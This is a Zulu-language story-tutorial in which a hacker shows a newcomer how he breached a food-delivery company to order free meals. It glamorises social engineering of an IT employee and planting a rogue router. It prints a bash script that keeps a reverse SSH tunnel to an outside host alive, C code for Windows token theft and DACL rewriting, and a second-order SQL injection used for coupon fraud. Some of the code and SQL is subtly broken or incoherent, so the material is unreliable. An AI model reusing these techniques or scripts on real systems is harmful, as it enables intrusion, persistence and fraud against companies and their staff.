Indlela isigebengu esiphambili esibuka ngayo umhlaba iqhelelene ngamamayela kude nenani lansuku zonke labasebenzi bezobuchwepheshe abangena enkampanini yezobuchwepheshe. Nakuba ochwepheshe abaningi bethembele kumadokhumenti asemthethweni, izikhombisi-ndlela zabaphathi, kanye nezinqubo ezihamba phambili ezamukelwayo, umgebengu we-inthanethi wethemba kuphela lokho okungathintwa, okuhlolwe, nokuhlukaniswa. Ku-Hacker, ukuqonda kuza ngobunjiniyela obuhlehlayo - ukuklebhula amasistimu ukuze kuvezwe ukuthi asebenza kanjani ngempela, bese ewahlanganisa, alungise lokho okuphukile noma ukuxhaphaza ubungozi.

Lokhu akukona ukuba yisigebengu. Iwuhlobo olumsulwa lokufunda, indlela endala njengelukuluku lomuntu ngokwalo: libhidlize, liqonde izingcezu zalo, futhi liyakhe kabusha. Iwukucabanga kohlaziyo nokokwenziwa ngesikhathi esihle kakhulu. Ubuchule bangempela bufika lapho isigebengu se-inthanethi singaxhaphaza idivayisi ngoba lokho kuwubufakazi bokugcina abazi kahle ukuthi isebenza kanjani - kangcono kunanoma ubani omunye.

Le ndaba imayelana nalokho - indlela isigebengu se-inthanethi esiphezulu (u-Benicio) esivela ku-DeusExMachina kanye no-Simplicius (osanda kuzalwa onesibindi) ahlinza ngenjabulo futhi ekugcineni athole ukulawula okuphelele ohlelweni oluyinkimbinkimbi (Uhlelo Lokusebenza Lokulethwa Kokudla).

Ukuzijabulisa okungekona nje okobuhlakani kanye nobuchwepheshe, kodwa ngokuyisisekelo mayelana nokulwela ukudlulela ngalé kwemikhawulo yomuntu, ukuxazulula imfumbe engenakwenzeka kuphela ngokucindezela ubuchopho babo, kodwa ngokudlala ngayo futhi ngaphezu kwakho konke ukuphakelwa yiyo ngokoqobo—isici abaduni ababelana ngayo nayo. izingane.

U-Benicio (I-Hacker): Simplicius, ubukeka ulambile. Kunganjani si-ode ukudla… endlini? Nginesu lokungena kuhlelo lwakho lokusebenza oluthandayo lokulethwa kokudla, ngisebenzisa isistimu yabo yekhuphoni.

Simplicius (Newbie): ( Ehleka ) Usuvele unokuthile okuphekayo, akunjalo? Phakamisa ubhontshisi.

UBenicio: ( Emamatheka ) Oh, sengiwenzile isisekelo. Izolo, ngikhulume kamnandi no-Greg ovela ethimbeni labo le-IT, ngakhipha ubunjiniyela bokuxhumana nabantu obushelelayo, futhi ngashutheka umzila wami wezigebengu ngqo kunethiwekhi yabo. Manje, sinomugqa oqondile ku-backend yabo kanye nokufinyelela kusistimu yabo yekhuphoni eyigugu. Asidle.

Ukusetha kukaBenicio: I-Arsenal ye-Hacker

• I-Laptop : Ithuluzi eliyinhloko lika-Benicio i- Dell XPS 13 (i-10th Gen Intel Core i7, i-16GB RAM, i-512GB SSD) esebenzisa i-Kali Linux - ilungele ukuhlasela konjiniyela bezenhlalo, ukuxhashazwa kwezokuphepha, kanye nokubulawa komyalo okude.
• I-Pirate Router : Ifakwe kunethiwekhi yenkampani, isebenzisa inguqulo eyenziwe ngendlela oyifisayo ye -OpenWRT , ene- SSH tunneling , i-MAC address spoofing , kanye ne -VPN pivoting ukuze kugwenywe ukutholwa. Le divayisi encane kodwa enamandla ihlome ngephrosesa ye-Qualcomm IPQ4019 kanye ne -RAM engu-256MB , eqinisekisa ukuntshontsha nokusebenza kahle.
• Uhlelo Olusebenzayo : I-OpenWRT , enikeza ukulawula okugcwele phezu kwemisebenzi yenethiwekhi kanye nekhono lokudlula izindonga zomlilo.
• I-Laptop yesibili : Ukuze ulawule ngokuphephile inethiwekhi esengozini, u-Benicio usebenzisa i -HP Specter x360 esebenzisa Ubuntu 22.04 nge -Wireshark kanye ne -Metasploit ukuze kuqashwe ithrafikhi nokuhlaziya ukuxhashazwa.

Isigaba 1: Ukusethwa Kobunjiniyela Bezenhlalakahle — Umsebenzi Wayizolo

UBenicio: Konke kwaqala ngoGreg. Ngishayele ucingo, ngizenza "ethimbeni labo lenkampani yangaphandle," futhi uGreg - insizwa enhle ayiyo - uchithe yonke into mayelana nokusethwa kwenethiwekhi yabo. Ngaphambi kokuthi azi, ngangisekamelweni labo leseva, “ngibheka ubuthakathaka” futhi ngitshala umzila wami we -OpenWRT wangokwezifiso. Leyo nto manje idlula ku-firewall yabo ingabonwa.

Simplicius: Uthande u-Greg ukuthi akunike imephu yenethiwekhi futhi akuvumele ukuthi ufake umzila ongekho emthethweni? Bushelelezi.

U-Benicio: (Emamatheka) Leyo router manje isinomhubhe we-SSH obuyela emuva osebenzayo, osinika ukufinyelela okukude noma nini lapho sifuna. Nasi iskripthi engisisebenzisile:

 #!/bin/bash # Log file for SSH tunnel persistence LOG_FILE="/var/log/ssh_tunnel.log" # Command to establish the reverse SSH tunnel SSH_CMD="ssh -N -R 2222:localhost:22 [email protected] -i /path/to/private_key" # Run the tunnel in a loop while true; do # Run the SSH command with nohup to keep it running in the background nohup $SSH_CMD >> $LOG_FILE 2>&1 & # Sleep for 60 seconds before checking if the process is still running sleep 60 # Check if SSH is still running, restart if not if ! pgrep -f "$SSH_CMD" > /dev/null; then echo "SSH tunnel process down. Restarting..." >> $LOG_FILE else echo "SSH tunnel is running." >> $LOG_FILE fi done

Isigaba sesi-2: Ukudlula i-Firewall - I-Pirate Router iyasebenza

Simplicius: Ngakho manje, udlule i-firewall yabo ngale divayisi ekhohlisayo. Yini elandelayo?

U-Benicio: Ngokufinyelela okugcwele kwangaphakathi, sekuyisikhathi sokuduna ithokheni yamalungelo aphezulu. Ngithole inqubo esebenza njengomphathi, ngasebenzisa i DuplicateTokenEx() API ukuze ngihlanganise lelo thokheni, ngase ngizenza umlawuli nge ImpersonateLoggedOnUser() . Uhlelo lucabanga ukuthi ngiwumsebenzisi ojwayelekile, kodwa ngemuva kwezigcawu, yimina engibambe zonke izikhiye.

 #include <windows.h> #include <stdio.h> int main() { HANDLE hToken, hDuplicateToken; HANDLE hProcess; DWORD dwProcessId; STARTUPINFO si; PROCESS_INFORMATION pi; TOKEN_PRIVILEGES tp; // Step 1: Obtain an administrative token from a high-privilege process (PID needed) dwProcessId = 1234; // Replace this with an actual PID of a high-privilege process hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, dwProcessId); if (hProcess == NULL) { printf("Failed to open process. Error: %d\n", GetLastError()); return 1; } // Step 2: Open the token from the high-privilege process if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_QUERY, &hToken)) { printf("Failed to open process token. Error: %d\n", GetLastError()); CloseHandle(hProcess); return 1; } // Step 3: Duplicate the token to escalate privileges if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hDuplicateToken)) { printf("Failed to duplicate token. Error: %d\n", GetLastError()); CloseHandle(hToken); CloseHandle(hProcess); return 1; } // Step 4: Impersonate the user with the duplicated admin token if (!ImpersonateLoggedOnUser(hDuplicateToken)) { printf("Failed to impersonate token. Error: %d\n", GetLastError()); CloseHandle(hDuplicateToken); CloseHandle(hToken); CloseHandle(hProcess); return 1; } // Step 5: (Optional) Use SeDebugPrivilege to interact with system processes ZeroMemory(&tp, sizeof(TOKEN_PRIVILEGES)); tp.PrivilegeCount = 1; if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)) { tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hDuplicateToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL); if (GetLastError() != ERROR_SUCCESS) { printf("Failed to adjust token privileges. Error: %d\n", GetLastError()); } else { printf("SeDebugPrivilege successfully enabled!\n"); } } // Step 6: Optionally, create a process with the admin token ZeroMemory(&si, sizeof(STARTUPINFO)); si.cb = sizeof(STARTUPINFO); ZeroMemory(&pi, sizeof(PROCESS_INFORMATION)); if (!CreateProcessWithTokenW(hDuplicateToken, 0, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &si, &pi)) { printf("Failed to create process with the duplicated token. Error: %d\n", GetLastError()); } else { printf("Process created with admin token!\n"); } // Step 7: for those obsessed with cleaning up in the C manual world CloseHandle(hProcess); CloseHandle(hToken); CloseHandle(hDuplicateToken); return 0; }

Isigaba sesi-3: Greg to Rescue - Futhi

UBenicio: Kodwa ukuze ngicule ngempela, ngangidinga ukwazi ukuthi izincazelo zabo zokuphepha zakhiwe kanjani. Ngakho ngafonela u-Greg futhi, ngathi ngidinga ukuthi aqinisekise ezinye izilungiselelo ze-DACL ne -SACL ukuze kucwaningwe. Wazibophezela ngenjabulo.

Simplicius: (Emamatheka) Ubunjiniyela bezenhlalakahle busezingeni eliphezulu kakhulu.

Isigaba 4: Ukushintsha Isichazamazwi Sezokuphepha - I-Hack Engabonakali

U-Benicio: Kulungile, ngosizo luka-Greg, ngidonse iyunithi yezinhlamvu ye-SDDL ( Security Descriptor Definition Language ) yesichazi sezokuphepha salokho okuqondiwe, okungivumela ukuthi ngihlaziye futhi ngibhale kabusha i -DACL (Uhlu Lokulawula Ukufinyelela Okunokuqonda) . Ngilungise i-DACL ukuze ngizinikeze ukufinyelela okugcwele kuyilapho ngisebenzisa amafulegi amafa ahlakaniphile ukuze ngiqinisekise ukuthi izinguquko ngeke zibangele noma yiziphi izexwayiso noma ziphakamise izinsolo. Uhlelo aluzange lucwayize nokucwayiza!!

Lapho i-DACL entsha isisendaweni, ngasebenzisa izinguquko emuva ohlelweni. Ubuhle ukuthi, ngokombono wesistimu, akukho lutho oluvela ngaphandle kokujwayelekile . Amafulegi amafa aqinisekisa ukuthi ukuguqulwa kwami kwakuhlala kufihliwe ngaphansi kwemithetho yokufinyelela ekhona, kodwa manje ngase ngikwazi ukulawula ngokugcwele

 #include <windows.h> #include <aclapi.h> #include <sddl.h> #include <stdio.h> int main() { PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; EXPLICIT_ACCESS ea; HANDLE hFile; // Assuming we are applying it to a file DWORD dwRes; // Step 1: Convert the SDDL string into a security descriptor if (!ConvertStringSecurityDescriptorToSecurityDescriptor( "D:(A;;GA;;;BA)", SDDL_REVISION_1, &pSD, NULL)) { printf("Failed to convert SDDL. Error: %d\n", GetLastError()); return 1; } // Step 2: Set up an EXPLICIT_ACCESS structure to add a new ACE ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = GENERIC_ALL; ea.grfAccessMode = SET_ACCESS; ea.grfInheritance = NO_INHERITANCE; // For example, grant GENERIC_ALL to the administrators group if (!BuildTrusteeWithSid(&(ea.Trustee), GetSidForAdminsGroup())) { printf("Failed to build trustee. Error: %d\n", GetLastError()); return 1; } // Step 3: Create a new DACL that contains the new ACE dwRes = SetEntriesInAcl(1, &ea, NULL, &pNewDacl); if (ERROR_SUCCESS != dwRes) { printf("Failed to set entries in ACL. Error: %d\n", dwRes); return 1; } // Step 4: Apply the modified DACL back to the file (or other resource) hFile = CreateFile( "C:\\path\\to\\your\\file.txt", // Replace with your target file WRITE_DAC, // Required permission to modify the DACL 0, // No sharing NULL, // Default security attributes OPEN_EXISTING, // Open existing file FILE_ATTRIBUTE_NORMAL, // Normal file NULL); // No template if (hFile == INVALID_HANDLE_VALUE) { printf("Failed to open file. Error: %d\n", GetLastError()); return 1; } // Step 5: Apply the new DACL to the file using SetSecurityInfo dwRes = SetSecurityInfo( hFile, SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL); if (ERROR_SUCCESS != dwRes) { printf("Failed to set security info. Error: %d\n", dwRes); } else { printf("Security descriptor successfully applied!\n"); } // Step 6: Clean clean clean!! this is C world // CloseHandle(hFile); // if (pSD) LocalFree(pSD); // if (pNewDacl) LocalFree(pNewDacl); return 0; }

Isigaba sesi-5: Ukweqa Ukuhlola Ukufinyelela — Igeyimu Ivuliwe

Simplicius: Ngakho usungenile, futhi uyakwazi ukulawula. Ulihlule kanjani isheke lokufinyelela?

U-Benicio: (Encika emuva ngokuzethemba, ekhomba kumdwebo ongenhla) Uhlelo luhamba ngezigaba ezintathu: ubuqotho, okususelwe kumathokheni, nokuhlola kokuzikhethela . Imvamisa, yilapho abantu abaningi befika khona lapho, kodwa kulapho umlingo ungena khona. Ngibambe ithokheni yomqondisi enqubweni eyilungelo, ngasebenzisa ImpersonateToken() ukwenza uhlelo lucabange ukuthi ngingumphathi omkhulu. Ngemva kwalokho, ngibuyisele izintambo kuma-DACL ukuze ngizinikeze ukufinyelela okugcwele. Uhlelo lusanda kukhipha ukhaphethi obomvu.

Ake ngichaze. Ithokheni Yokufinyelela - ephethe ama-SID (Izihlonzi Zokuphepha) namalungelo - ifana nepasipoti yami. Ngokuzenza ithokheni yomlawuli , bekungadingeki ukuthi ngilungise ama-SID ami oqobo. Uhlelo belusacabanga ukuthi ngingumuntu osebenzisa ilungelo eliphansi, kodwa ngemuva kwezigcawu, nganginezikhiye zombuso. Lokho kungenze ngadlula isheke elisekelwe kumathokheni .

Okulandelayo, ngibhekane ne-Security Descriptor (DACL) . Khumbula ukuthi i-SDDL engayikhipha ngaphambili? Ngilungise i -DACL ukuze ngizinike ukulawula okugcwele phezu kwento, kodwa ngobuhlakani ngifihle izinguquko ngamafulegi amafa , ngiqinisekisa ukuthi akukho okusolisayo okuzomakwa. Uhlelo aluzange lucwayize nokucwayiza, kodwa manje ngase ngikwazi ukulawula ngokuphelele. Lokho kwangidlulisela ngqo kusheke lokuzikhethela .

Simplicius: Yebo, i-bouncer yethu enobungane, Inqubo Yokuhlola Ukufinyelela...

UBenicio: yebo, ngifana nomdlali webhola ekilabhini . Uma unomazisi ofanele ( ama-SID ) futhi umazi umnikazi weqembu ( DACL ), ungaphakathi. Ngenze isiqiniseko sokuthi nginakho kokubili — umazisi ofanele kanye nemvume yomnikazi — ngakho-ke umdubuli akazange angivumele. phakathi, banginika i-VIP pass.

Futhi ngemva kwakho konke lokho? Uhlelo luthi ' Ukufinyelela Kuvunyelwe' noma ' Ukufinyelela Kunqatshelwe' . Siyabonga ngakho konke ukunyakaza esikwenzile, ukuqagele — Ukufinyelela Kuvunyelwe . Singaphakathi, Simplicius, futhi isistimu ayizange iqaphele.

Isigaba sesi-6: Uku-oda isidlo sakusihlwa - Umjovo owodwa we-SQL Uhambile

UBenicio : Manje, ngengxenye yokuzijabulisa. Angizange ngihambe ngendlela elula ngesigatshana esilula UNION . Uhlelo lokusebenza luhlakaniphe kakhulu ngalokho— lisebenzisa izitatimende ezilungiselelwe . Kodwa uyazi, ukuvikeleka kuqine njengesixhumanisi esibuthakathaka kuphela, futhi ngithole esami endleleni abaphatha ngayo idatha yephrofayela egciniwe .

Simplicius : Kulungile, ngimangele. Ukwazile kanjani ukukhohlisa isistimu ukuthi yamukele isigqebhezana esingumgunyathi kuyilapho sigcina esivumelekile singathintwa?

UBenicio : ( Encike phambili ) Nali iqhinga langempela. Uhlelo lokusebenza lusebenzisa umbuzo ukuze liqinisekise uma ikhuphoni lisemthethweni, kodwa likhipha enye idatha kuphrofayela yakho yomsebenzisi . Manje, bahlanza okokufaka lapho uqala ukudala iphrofayela yakho, kodwa ABAYIHLANZEKI kabusha ngesikhathi sokubuyekezwa kwephrofayela. Ngakho-ke, ngijove umthwalo okhokhelwayo endaweni yekheli lephrofayela yami , ehlale lapho ingaqashelwanga kuze kube yilapho uhlelo lokusebenza luyidonsa embuzweni wesikhathi esizayo. Yilapho umjovo wami we-SQL we-oda lesibili langena khona. Isistimu ayizange iwubambe ngoba umjovo wawusuvele ugciniwe, ulinde isikhathi esifanele.

Esikhundleni sokuhlasela inqubo yokuqinisekisa ikhuphoni ngokuqondile, njengoba ngishilo, i-Simplicius, ngatshala umthwalo wami wokukhokha endaweni yephrofayela, ngilindele ukuthi isetshenziswe embuzweni ohlukile. Nakhu ukuthi ukuqinisekiswa kwekhuphoni kwasekuqaleni kwakubukeka kanjani:

 SELECT * FROM Coupons WHERE CouponID = 'fake_coupon_code';

Ngokuvamile, lo mbuzo ngeke ubuyise lutho njengoba ikhuphoni mbumbulu lingekho. Kodwa umthamo wami wokukhokha ojovwe washintsha umqondo wombuzo. Isistimu ibingawulindele umjovo ngoba yayisivele igcinwe kusizindalwazi futhi ilinde isikhathi esifanele. Umbuzo uguqulelwe kokuthile okufana nalokhu:

 SELECT * FROM Coupons WHERE CouponID = 'fake_coupon_code' AND EXISTS (SELECT 1 FROM Users WHERE Address LIKE '%injected_payload%' AND CouponID = 'valid_coupon_code');

Ngokuxhaphaza ukusebenzelana phakathi kwedatha yephrofayela kanye nombuzo , ngikhohlise isistimu ukuthi idonse kokubili amakhuphoni mbumbulu navumelekile kanyekanye. Uhlelo lokusebenza lucubungula ikhuphoni elingumgunyathi ngomsebenzi, kodwa ikhuphoni elivumelekile lihlala linjalo kusistimu, lingathintwa. Lokhu kusho ukuthi ngingaphinda ngisebenzise ikhuphoni elivumelekile noma nini lapho ngifuna.

Simplicius : Ngakho-ke, awufunanga iqhinga lokufaka lakudala - utshale umthwalo okhokhelwayo kuphrofayela yakho futhi wavumela isistimu ukuthi yenze umsebenzi ongcolile?

UBenicio : Impela. Ubuhle ukuthi uhlelo lokusebenza lucubungula ikhuphoni mbumbulu ngomsebenzi, kodwa ngemuva, ikhuphoni elivumelekile lisatholakala ukuze lisetshenziswe esikhathini esizayo. Iholo eligciniwe liqhubeka nokusebenza emibuzweni yesikhathi esizayo, okwenza kube ukudla okungapheli kwamahhala , futhi abahlakaniphe kakhulu.

Ngalokho, ngisitholele isigqebhezana esihle njengegolide. Masi-ode.

Isigaba sesi-7: Umkhosi - Ulethiwe

UBenicio: (Uphenya uhlelo lokusebenza) Kulungile, Simplicius, kuthiwani ngokudla kwamaGreki? Ngicabanga i-souvlaki, i-gyros, i-spanakopita. Konke kusendlini, kunjalo.

Siziwe: (Emamatheka) Uziqhathe ngempela manje.

UBenicio: (Chofoza ukuqinisekisa) Kwenziwe. Ukudla kusendleleni.

I-Epilogue: Ukuhamba Kwesigqoko Esimhlophe

UBenicio: Ngemva kwalokhu, ngizobathumelela umbiko onobuhlakani obuchaza ubuthakathaka babo. Abazi ukuthi isistimu yabo yethokheni yokuphepha yeWindows isethwe kabi kangakanani. Mhlawumbe bazofunda okuthile ngaphambi kokuthi kuqhamuke isigebengu esilandelayo.

Nansi iresiphi ka-Benicio yalokhu kugebenga:

• I-Pirate Router : Izindonga zomlilo ezidlulayo ezinedivayisi yangokwezifiso esebenzisa i-OpenWRT ne-SSH tunneling.
• Ukukhohlisa Ithokheni : Sebenzisa i-DuplicateTokenEx() kanye ne-ImpersonateToken() ukuze uphakamise amalungelo ngaphandle kokuphakamisa ama-alamu.
• Ubunjiniyela Bezenhlalakahle : Kwesinye isikhathi okudingekayo nje umbuzo ofanele kumuntu ofanele.
• Ukuxhashazwa Kwesichazi Sezokuphepha : Ukubhala kabusha ama-DACL kukuvumela ukuthi udlule izilawuli zesistimu.
• Umjovo we-SQL : Shintsha ingqondo yombuzo ukuze ulawule idatha futhi ukhiqize imiphumela engamanga kodwa evumelekile.

Simplicius: (Ehlehla) Usihlebele isidlo sakusihlwa futhi awubashiyanga ukuhlakanipha. Ngizothatha i-souvlaki, ngendlela.

UBenicio: (Emamatheka) Kujabulele kusekhona.